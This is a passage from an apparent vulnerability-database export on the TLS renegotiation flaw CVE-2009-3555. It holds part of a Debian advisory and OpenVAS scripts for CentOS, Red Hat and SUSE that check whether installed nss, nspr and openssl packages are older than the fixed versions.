This update\nadds backported support for the new RFC5746 renegotiation extension\nwhich fixes this issue.\n\nThe updated libraries allow to use shell environment variables to\nconfigure if insecure renegotiation is still allowed. The syntax of\nthese environment variables is described in the release notes to\nversion 3.12.6 of nss:\n \nhttps://developer.mozilla.org/NSS_3.12.6_release_notes\n\nHowever, the default behaviour for nss in Debian 5.0 (Lenny) is \nNSS_SSL_ENABLE_RENEGOTIATION=3, which allows clients to continue to\nrenegotiate with vulnerable servers.\n\nFor the stable distribution (lenny), this problem has been fixed\nin version 3.12.3.1-0lenny3.\n\nFor the unstable distribution (sid), and the testing distribution\n(squeeze), this problem has been fixed in version 3.12.6-1.\n\nWe recommend that you upgrade your nss package.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2011-01-05T23:20:42", "published": "2011-01-05T23:20:42", "id": "DEBIAN:DSA-2141-2:2C2CF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00002.html", "title": "[SECURITY] [DSA-2141-2] New nss packages fix protocol design flaw", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-25T10:55:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of nspr", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880611", "href": "http://plugins.openvas.org/nasl.php?oid=880611", "type": "openvas", "title": "CentOS Update for nspr CESA-2010:0165 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# 
CentOS Update for nspr CESA-2010:0165 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to support\n the cross-platform development of security-enabled client and server\n applications. Applications built with NSS can support SSLv2, SSLv3, TLS,\n and other security standards.\n\n Netscape Portable Runtime (NSPR) provides platform independence for non-GUI\n operating system facilities. These facilities include threads, thread\n synchronization, normal file and network I/O, interval timing, calendar\n time, basic memory management (malloc and free), and shared library\n linking.\n \n A flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\n Sockets Layer) protocols handled session renegotiation. A man-in-the-middle\n attacker could use this flaw to prefix arbitrary plain text to a client's\n session (for example, an HTTPS connection to a website). This could force\n the server to process an attacker's request as if authenticated using the\n victim's credentials. 
This update addresses this flaw by implementing the\n TLS Renegotiation Indication Extension, as defined in RFC 5746.\n (CVE-2009-3555)\n \n Refer to the following Knowledgebase article for additional details about\n this flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n \n Users of Red Hat Certificate System 7.3 and 8.0 should review the following\n Knowledgebase article before installing this update:\n http://kbase.redhat.com/faq/docs/DOC-28439\n \n All users of NSS are advised to upgrade to these updated packages, which\n update NSS to version 3.12.6. This erratum also updates the NSPR packages\n to the version required by NSS 3.12.6. All running applications using the\n NSS library must be restarted for this update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"nspr on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-March/016602.html\");\n script_id(880611);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0165\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"CentOS Update for nspr CESA-2010:0165 centos5 i386\");\n\n script_summary(\"Check for the Version of nspr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n 
script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-pkcs11-devel\", rpm:\"nss-pkcs11-devel~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:32:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of nss", "modified": "2017-12-21T00:00:00", "published": "2010-03-31T00:00:00", "id": "OPENVAS:870238", "href": "http://plugins.openvas.org/nasl.php?oid=870238", "type": "openvas", "title": "RedHat Update for nss RHSA-2010:0165-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for nss RHSA-2010:0165-01\n#\n# 
Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to support\n the cross-platform development of security-enabled client and server\n applications. Applications built with NSS can support SSLv2, SSLv3, TLS,\n and other security standards.\n\n Netscape Portable Runtime (NSPR) provides platform independence for non-GUI\n operating system facilities. These facilities include threads, thread\n synchronization, normal file and network I/O, interval timing, calendar\n time, basic memory management (malloc and free), and shared library\n linking.\n \n A flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\n Sockets Layer) protocols handled session renegotiation. A man-in-the-middle\n attacker could use this flaw to prefix arbitrary plain text to a client's\n session (for example, an HTTPS connection to a website). This could force\n the server to process an attacker's request as if authenticated using the\n victim's credentials. 
This update addresses this flaw by implementing the\n TLS Renegotiation Indication Extension, as defined in RFC 5746.\n (CVE-2009-3555)\n \n Refer to the following Knowledgebase article for additional details about\n this flaw: http://kbase.redhat.com/faq/docs/DOC-20491 \n \n Users of Red Hat Certificate System 7.3 and 8.0 should review the following\n Knowledgebase article before installing this update:\n http://kbase.redhat.com/faq/docs/DOC-28439\n \n All users of NSS are advised to upgrade to these updated packages, which\n update NSS to version 3.12.6. This erratum also updates the NSPR packages\n to the version required by NSS 3.12.6. All running applications using the\n NSS library must be restarted for this update to take effect.\";\n\ntag_affected = \"nss on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-March/msg00023.html\");\n script_id(870238);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-31 14:20:46 +0200 (Wed, 31 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0165-01\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"RedHat Update for nss RHSA-2010:0165-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-debuginfo\", rpm:\"nspr-debuginfo~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-debuginfo\", rpm:\"nss-debuginfo~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-pkcs11-devel\", rpm:\"nss-pkcs11-devel~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-debuginfo\", rpm:\"nspr-debuginfo~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-debuginfo\", rpm:\"nss-debuginfo~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:56:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:057.", "modified": "2017-07-11T00:00:00", "published": "2009-11-23T00:00:00", "id": "OPENVAS:66302", "href": "http://plugins.openvas.org/nasl.php?oid=66302", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:057 (openssl)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_057.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:057 (openssl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate already sent data to a renegotiated connection.\nThis allowed man-in-the-middle attackers to inject HTTP requests in a\nHTTPS session without being noticed.\nFor example Apache's mod_ssl was vulnerable to this kind of attack because\nit uses openssl.\n\nIt is believed that this vulnerability is actively exploited in the wild to\nget access to HTTPS protected web-sites.\n\nPlease note that renegotiation will be disabled for any application using\nopenssl by this update and may cause problems in some cases.\nAdditionally this attack is not limited to HTTP.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:057\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:057.\";\n\n \n\nif(description)\n{\n script_id(66302);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", 
value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-23 20:51:51 +0100 (Mon, 23 Nov 2009)\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:057 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo\", rpm:\"compat-openssl097g-debuginfo~0.9.7g~149.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debugsource\", rpm:\"compat-openssl097g-debugsource~0.9.7g~149.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-debuginfo\", rpm:\"libopenssl0_9_8-debuginfo~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~149.5.3\", rls:\"openSUSE11.2\")) != NULL) 
{\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo\", rpm:\"compat-openssl097g-debuginfo~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debugsource\", rpm:\"compat-openssl097g-debugsource~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo\", rpm:\"compat-openssl097g-debuginfo~0.9.7g~119.7\", 
rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debugsource\", rpm:\"compat-openssl097g-debugsource~0.9.7g~119.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~119.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8h~28.2.1\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8h~25.2.13\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo-64bit\", rpm:\"compat-openssl097g-debuginfo-64bit~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-64bit\", rpm:\"compat-openssl097g-64bit~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-64bit\", 
rpm:\"libopenssl0_9_8-64bit~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-64bit\", rpm:\"compat-openssl097g-64bit~0.9.7g~119.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-64bit\", rpm:\"libopenssl0_9_8-64bit~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo-32bit\", rpm:\"compat-openssl097g-debuginfo-32bit~0.9.7g~149.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-debuginfo-32bit\", rpm:\"libopenssl0_9_8-debuginfo-32bit~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-32bit\", rpm:\"compat-openssl097g-32bit~0.9.7g~149.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-32bit\", rpm:\"libopenssl0_9_8-32bit~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo-32bit\", rpm:\"compat-openssl097g-debuginfo-32bit~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-32bit\", rpm:\"compat-openssl097g-32bit~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-32bit\", rpm:\"libopenssl0_9_8-32bit~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-32bit\", rpm:\"compat-openssl097g-32bit~0.9.7g~119.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-32bit\", rpm:\"libopenssl0_9_8-32bit~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": 
{"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-14T11:48:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of openssl097a", "modified": "2017-12-14T00:00:00", "published": "2010-03-31T00:00:00", "id": "OPENVAS:870236", "href": "http://plugins.openvas.org/nasl.php?oid=870236", "type": "openvas", "title": "RedHat Update for openssl097a RHSA-2010:0164-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl097a RHSA-2010:0164-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\n and Transport Layer Security (TLS v1) protocols, as well as a\n full-strength, general purpose cryptography library.\n\n A flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\n Sockets Layer) protocols handled session renegotiation. 
A man-in-the-middle\n attacker could use this flaw to prefix arbitrary plain text to a client's\n session (for example, an HTTPS connection to a website). This could force\n the server to process an attacker's request as if authenticated using the\n victim's credentials. This update addresses this flaw by implementing the\n TLS Renegotiation Indication Extension, as defined in RFC 5746.\n (CVE-2009-3555)\n \n Refer to the following Knowledgebase article for additional details about\n this flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n \n All openssl097a users should upgrade to these updated packages, which\n contain a backported patch to resolve this issue. For the update to take\n effect, all services linked to the openssl097a library must be restarted,\n or the system rebooted.\";\n\ntag_affected = \"openssl097a on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-March/msg00022.html\");\n script_id(870236);\n script_version(\"$Revision: 8109 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-14 07:31:15 +0100 (Thu, 14 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-31 14:20:46 +0200 (Wed, 31 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0164-01\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"RedHat Update for openssl097a RHSA-2010:0164-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl097a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", 